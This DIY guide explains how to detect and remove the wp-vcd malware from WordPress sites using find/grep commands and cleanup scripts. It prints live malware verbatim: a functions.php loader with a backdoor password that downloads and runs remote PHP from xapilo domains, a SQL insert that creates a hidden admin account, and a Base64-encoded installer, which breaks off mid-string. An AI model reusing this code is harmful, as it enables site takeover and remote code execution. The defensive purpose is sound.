DIY Removing the wp-vcd Malware From Self-Hosted WordPress Sites
Want to learn how to remove common malware from your (self-hosted) WordPress CMS?
Having used and worked with WordPress since 2007, I have toiled over several dozen websites, doing some development and lots of tinkering. Because WordPress is open-source and therefore a very open system, one of the issues frequently encountered in such work is malware passed on from various resources, or from freelancers doing the work for you who, perhaps lacking a certain meticulousness, unknowingly bring an infection into your project by honest mistake.

It's a familiar story and it usually goes like this: you hire someone and have them do some customization on your WordPress project, maybe even some development. Everything seems just fine, but after some time your WordPress site starts acting up: taking up more system resources than it should, sometimes crashing with HTTP 500 internal server errors, or otherwise misbehaving, and you might even blame the hosting for it. It's the question you secretly dread: the code had already been checked and optimized, and every website (or web application) security precaution had been taken, right? What could be wrong then?

Well, here's the bad news: maybe your hosting / cloud service ISP's malware scan was not as thorough as they boasted. Perhaps your WordPress site (or application) has been silently infected with malware. Could it be wp-vcd-positive?! :0
What is wp-vcd / wp-tmp.php Malware?
Manuel D’Orso (CirKu17 @ INTJ) published an article on Medium titled Wp-vcd Malware Analysis describing what it is and how it works.
Sometimes encountered in a file named wp-vcd.php or wp-tmp.php, the main objective of this particular malware is to add a secret admin user to the backend of WordPress sites. According to Bleeping Computer, attackers use this backdoor account to open connections to infected websites so that they can carry out scripted attacks at later dates.
How to check if your WordPress installation has WP-VCD malware
Performing a WordPress Malware Scan with a Plugin
If you are not a “techie” person, you may want to go the easy way and use ready-made software to scan your site. There is a popular plugin called ‘Wordfence’ with both a free light version and a premium version. Luckily, the malware scanning feature appears to be enabled in the free version, although in my case the scan timed out 5 to 10 minutes after starting it.
Scanning WP-VCD Malware Manually to Check if Your WordPress is Infected
If you would rather not use a plugin, which could put an additional burden on your server’s resources, and prefer to do it manually, here is my walkthrough. If you have basic UNIX/Linux skills, I’ll walk you through the whole process starting with a command-line terminal.
First off, open a terminal session in an SSH shell. If you are on a Mac or a Linux/UNIX machine, just fire up a Terminal window and SSH to your server. On Windows, you can use a free application such as PuTTY, or better yet, install and use Git Bash, which is my preferred way of running UNIX/Linux commands when I’m on Windows.
Either way, the next step is to check if there are any of the most typical files created by wp-vcd malware lurking about in the file system.
Now, while in Terminal, change directory to the root of your WordPress installation i.e. cd /path/to/your-wordpress and execute the following command:
find . -type f \( -name "wp-vcd.php" -o -name "wp-tmp.php" -o -name "class.theme-modules.php" -o -name "class.plugin-modules.php" \)
This searches for the presence of the following files in the file system where WordPress is installed:
- wp-vcd.php
- wp-tmp.php
- class.theme-modules.php
- class.plugin-modules.php
Believe it or not, none of the above files is meant to be present in a standard WordPress configuration. After running the above search command, anything found will be listed line by line with pathnames relative to your current directory. No results means that there are no files created by the wp-vcd malware.
As the next step, it is not a bad idea to remove these files immediately by running the remove command rm followed by the pathname of each file, which you can simply copy and paste from the search results in the Terminal window. But as long as the infection exists and you don’t get to the source of the problem, these files could, and most probably will, be re-created after the next HTTP request hits the web server to run a WordPress page (more precisely post.php), which is also likely to be already infected. Bear with me, because I’m going to show you how this malware works and what actions need to be taken to get rid of it.
How to Determine Which Code Files Are Spreading the Malicious Code
The simplest and most straightforward way to determine what part of the PHP code is creating these malicious files is to quickly search for specific chunks of text within all PHP files, so that you will know what you are up against.
How the WP-VCD Malware Works
If the source of the malware is a WordPress theme, the starting point of the malicious code is the functions.php file of the theme itself. This does not necessarily mean that this very theme brought in the malware in the first place; but once any of your WordPress files is infected by whatever add-on was installed, the active theme’s functions.php is usually one of the first places the virus reaches while spreading throughout multiple WordPress directories.
Once a theme containing the malicious code is activated, some of your WordPress core files become infected. Needless to say, the wp-includes folder will be the next crime scene toward that end. This is where at least wp-vcd.php and/or wp-tmp.php will be bred. To make matters worse, some malicious code will be injected to post.php in wp-includes which is a core standard WordPress file at the heart of every WP blog.
To find out which files are infected and re-create any of the four aforementioned malicious files, go back to the Terminal and, from a parent directory containing all WordPress files, run a grep command like the following. It searches the code of all PHP files underneath for references to any of the four essential malware files:
grep -rF --include='*.php' -e "class.plugin-modules.php" -e "class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" .
If there is no infection, the command will return nothing, otherwise it will list all the filenames with pathnames plus the code snippet following the filename after a colon.
Typically there will be a code block like the following in infected plugins:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>
Malicious code containing the encoded strings gets injected into the functions.php file of a WordPress theme or plugin (and then all of them as it spreads), and it begins by resetting the modification date and time in order to make the infection less conspicuous. Then it remotely populates a database/array of hostnames and passwords of the code injections via o.php, and downloads the content of a remote txt file into class.wp.php. In infected WordPress themes, the following code block is added to the beginning of the functions.php code of the theme itself:
The file class.theme-modules.php (or class.plugin-modules.php in the case of infected or infectious plugins) is one of the four files mentioned at the beginning of the text, and it is then included by the code added in functions.php. The encoded malicious code in it installs the wp-vcd malware into the theme and creates the rest of the malicious files.
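The checks described above, combined into one scanner that also looks at file contents and at the reset modification time. This is an added example, not code from the original article; the function names, the KIND labels and the demo tree are made up for illustration, and the theme include stub is assumed to mirror the plugin stub quoted above.

```sh
#!/bin/sh
# Added example, not from the original article. The content markers are strings
# visible in the infected samples quoted on this page.

# wpvcd_scan ROOT [DAYS]: print "KIND<TAB>PATH" for each indicator under ROOT.
wpvcd_scan() {
    scan_root=$1
    scan_days=${2:-30}

    # 1. The four files the malware drops.
    find "$scan_root" -type f \( -name 'wp-vcd.php' -o -name 'wp-tmp.php' \
        -o -name 'class.theme-modules.php' -o -name 'class.plugin-modules.php' \) |
        while IFS= read -r p; do printf 'dropped-file\t%s\n' "$p"; done

    # 2. Include stubs prepended to post.php, plugins and themes. The theme
    #    variant is an assumption modelled on the plugin stub in the article.
    #    -F matches fixed strings, so "." and "(" are taken literally.
    find "$scan_root" -type f -name '*.php' -exec grep -lF \
        -e "include_once(dirname(__FILE__) . '/wp-vcd.php')" \
        -e "include_once(dirname(__FILE__) . '/class.theme-modules.php')" \
        -e "include_once(dirname(__FILE__) . '/class.plugin-modules.php')" \
        {} + |
        while IFS= read -r p; do printf 'include-stub\t%s\n' "$p"; done

    # 3. The loader block injected at the top of functions.php.
    find "$scan_root" -type f -name '*.php' -exec grep -lF \
        -e '//$end_wp_theme_tmp' -e 'ERROR_WP_ACTION WP_V_CD WP_CD' {} + |
        while IFS= read -r p; do printf 'loader-block\t%s\n' "$p"; done

    # 4. Backdated files. touch() can rewrite mtime but not ctime, so a PHP file
    #    whose inode changed within DAYS while its mtime claims to be older is
    #    worth a look. Freshly unpacked archives look the same: a lead, not proof.
    find "$scan_root" -type f -name '*.php' \
        -ctime "-$scan_days" ! -mtime "-$scan_days" |
        while IFS= read -r p; do printf 'backdated-mtime\t%s\n' "$p"; done
}

# wpvcd_demo: build a small constructed tree (inert text, not real malware),
# scan it with a one-day window and print the findings.
wpvcd_demo() {
    demo_dir=$(mktemp -d) || return 1
    mkdir -p "$demo_dir/wp-includes" "$demo_dir/wp-content/themes/t1" \
        "$demo_dir/wp-content/themes/t2"
    printf '%s\n' '<?php // clean core file' > "$demo_dir/wp-includes/query.php"
    printf '%s\n' "<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php // post" \
        > "$demo_dir/wp-includes/post.php"
    : > "$demo_dir/wp-includes/wp-vcd.php"
    printf '%s\n' '<?php $div_code_name = "wp_vcd";' '//$start_wp_theme_tmp' \
        '//$end_wp_theme_tmp' '?><?php // theme code' \
        > "$demo_dir/wp-content/themes/t1/functions.php"
    printf '%s\n' '<?php // clean theme' > "$demo_dir/wp-content/themes/t2/functions.php"
    # Backdate the mtime the way the malware does; the ctime stays current.
    touch -t 201501010000 "$demo_dir/wp-content/themes/t1/functions.php"
    (cd "$demo_dir" && wpvcd_scan . 1)
    rm -rf "$demo_dir"
}

# Scan a real installation when a path is given: sh wpvcd_scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then wpvcd_scan "$@"; fi
```
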
How to Remove the wp-vcd Malware
Although there is more than one way of getting rid of this malware, neither the Wordfence plugin nor the Avast anti-virus for Mac succeeded in detecting any of wp-vcd.php, wp-tmp.php, class.theme-modules.php and class.plugin-modules.php in my case, so deleting this foursome manually and removing the rest of the malicious code from the post.php and functions.php files (not necessarily in this order, so keep reading) was one fool-proof way, in my experiment, of disinfecting the WordPress installation(s) from such an infection.
Removing WP-VCD Manually
If you have thoroughly read the above, you already know which files are sure to be deleted, but unless we first remove the code that pulls them in, they will be created again in no time.
So as a first step, find which post.php and functions.php files contain the malicious code, and then delete that code (or comment it out if you prefer to analyze it further). To be more specific, what needs to be removed from functions.php, if it is infected, is shown right below:
A typical functions.php from a simple WordPress theme before it was infected:
<?php if (function_exists('register_sidebar') ) register_sidebars(2, array( )); ?>
functions.php after getting infected with the malware:
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'e863f71d53726a93f47d5c4e141b927a')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . 
$phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4'; if (($tmpcontent = @file_get_contents("http://www.xapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.xapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.xapilo.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.xapilo.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 
'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?> <?php if (function_exists('register_sidebar') ) register_sidebars(2, array( )); ?>
To remove the malicious part of the code, delete lines 1 to 166 in the above example, that is, everything up to and including the ?> that follows //$end_wp_theme_tmp.
Then remove only the following from post.php in the wp-includes directory:
<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>
or replace post.php with the same one from a clean WordPress installation: /wp-includes/post.php
Other files which might be infected by wp-vcd
class.wp.php
The class.wp.php, which is normally a standard core WordPress file in wp-includes, will ultimately try to inject a user for future attackers into the WordPress database by executing code like:
$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");
In my experiment, this file never got infected: it had no code like the above, and a diff check against a clean, original WordPress counterpart showed nothing. But if you detect any malware infection, it is a very good idea to replace the entire wp-includes folder with a clean one from a fresh WordPress download. Make sure the versions match, though.
Finally, delete all instances of the files wp-vcd.php, wp-tmp.php, class.theme-modules.php and class.plugin-modules.php which might have spread across your WordPress installations.
From a command-line Terminal, after going to the parent directory containing all your WordPress files and sub-directories, you can use the following command – all in one line – to seek and destroy all four of the malicious files with one shot:
find . -type f \( -name "wp-vcd.php" -o -name "wp-tmp.php" -o -name "class.theme-modules.php" -o -name "class.plugin-modules.php" \) -delete
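The two manual edits described above (stripping the injected block from functions.php and the include stub from post.php) can be scripted so that they run before the find ... -delete step. This is an added example, not code from the original article; the function names and the quarantine directory are hypothetical, the demo files are constructed stand-ins, and the theme include stub is assumed to have the same form as the plugin and wp-vcd stubs quoted on this page.

```sh
#!/bin/sh
# Added example, not from the original article. It edits files in place, so the
# original is first copied to a quarantine directory outside the web root.

# strip_loader FILE: print FILE minus the injected prefix, i.e. everything up to
# and including the "?>" that follows //$end_wp_theme_tmp. Returns 1 if absent.
strip_loader() {
    grep -qF -e '//$end_wp_theme_tmp' "$1" || return 1
    awk '
        BEGIN { mark = "//$end_wp_theme_tmp" }
        state == 0 {                    # still inside the injected prefix
            m = index($0, mark)
            if (!m) next
            $0 = substr($0, m + length(mark)); state = 1
        }
        state == 1 {                    # marker seen, look for the closing tag
            c = index($0, "?>")
            if (!c) next
            $0 = substr($0, c + 2); state = 2
            sub(/^[ \t]+/, "")          # no stray output before the real <?php
            if ($0 == "") next
        }
        { print }
    ' "$1"
}

# strip_stub FILE NAME: print FILE minus the first include stub for NAME.
strip_stub() {
    stub="<?php if (file_exists(dirname(__FILE__) . '/$2')) include_once(dirname(__FILE__) . '/$2'); ?>"
    grep -qF -e "$stub" "$1" || return 1
    STUB="$stub" awk '
        BEGIN { stub = ENVIRON["STUB"] }
        !done && (i = index($0, stub)) {
            $0 = substr($0, 1, i - 1) substr($0, i + length(stub)); done = 1
            if ($0 == "") next
        }
        { print }
    ' "$1"
}

# wpvcd_clean FILE QUARANTINE_DIR: returns 0 if FILE was cleaned, 1 if it
# carried none of the known injections (the file is then left untouched).
wpvcd_clean() {
    target=$1
    backup=$2/$(printf '%s' "$target" | tr '/' '_').infected
    work=$(mktemp) || return 2
    cp -p "$target" "$backup" || return 2
    cleaned=1
    # [ -s ] refuses an empty result, e.g. a marker without a closing tag.
    if strip_loader "$target" > "$work" && [ -s "$work" ]; then
        cat "$work" > "$target"; cleaned=0     # cat keeps owner and mode
    fi
    for stub_name in wp-vcd.php class.theme-modules.php class.plugin-modules.php; do
        if strip_stub "$target" "$stub_name" > "$work" && [ -s "$work" ]; then
            cat "$work" > "$target"; cleaned=0
        fi
    done
    rm -f "$work"
    [ "$cleaned" -eq 0 ] || rm -f "$backup"
    return "$cleaned"
}

# wpvcd_clean_demo: run the cleanup on constructed, inert stand-ins for the
# infected files and print each result, then the number of quarantined copies.
wpvcd_clean_demo() {
    demo_dir=$(mktemp -d) || return 1
    mkdir "$demo_dir/site" "$demo_dir/quarantine"
    printf '%s\n' '<?php $div_code_name = "wp_vcd";' '//$start_wp_theme_tmp' \
        '//wp_tmp' '//$end_wp_theme_tmp' '?> <?php register_sidebars(2); ?>' \
        > "$demo_dir/site/functions.php"
    printf '%s\n' "<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php // core post.php" \
        > "$demo_dir/site/post.php"
    printf '%s\n' '<?php // untouched' > "$demo_dir/site/clean.php"
    for item in functions.php post.php clean.php; do
        if wpvcd_clean "$demo_dir/site/$item" "$demo_dir/quarantine"; then
            echo "cleaned $item"
        else
            echo "skipped $item"
        fi
        cat "$demo_dir/site/$item"
    done
    ls "$demo_dir/quarantine" | wc -l | tr -d ' '
    rm -rf "$demo_dir"
}
```

Diff each cleaned file against its quarantined copy before deleting the four dropped files, and compare post.php with the one from a clean WordPress download of the same version.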
Appendix [Example Malware Code]
Typical example of code found in class.theme-modules.php:
The class.theme-modules.php file, typically consisting of the code below, holds a large block of Base64-encoded text, which is not difficult to spot when its source code is examined.
<?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = '[Base64-encoded payload omitted]'; $GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media''modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes'); $GLOBALS['DIR_ARRAY'] = Array(); $dirs = Array(); $search = Array( Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => 
'$table_prefix'), ); function getDirList($path) { if ($dir = @opendir($path)) { $result = Array(); while (($filename = @readdir($dir)) !== false) { if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename)) $result[] = $path . '/' . $filename; } return $result; } return false; } function WP_URL_CD($path) { if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) ) { if (strpos($file, 'wp-vcd') === false) { $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; file_put_contents($path . '/wp-includes/post.php', $file); //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); } } } function SearchFile($search, $path) { if ($dir = @opendir($path)) { $i = 0; while (($filename = @readdir($dir)) !== false) { if ($i > MAX_ITERATION) break; $i++; if ($filename != '.' && $filename != '..') { if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) { SearchFile($search, $path . '/' . $filename); } else { foreach ($search as $_) { if (strtolower($filename) == strtolower($_['file'])) { $GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . 
$filename); } } } } } } } if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) { if (isset($_GET['plugin'])) { global $wpdb ; } $install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJ
CQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09
IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgI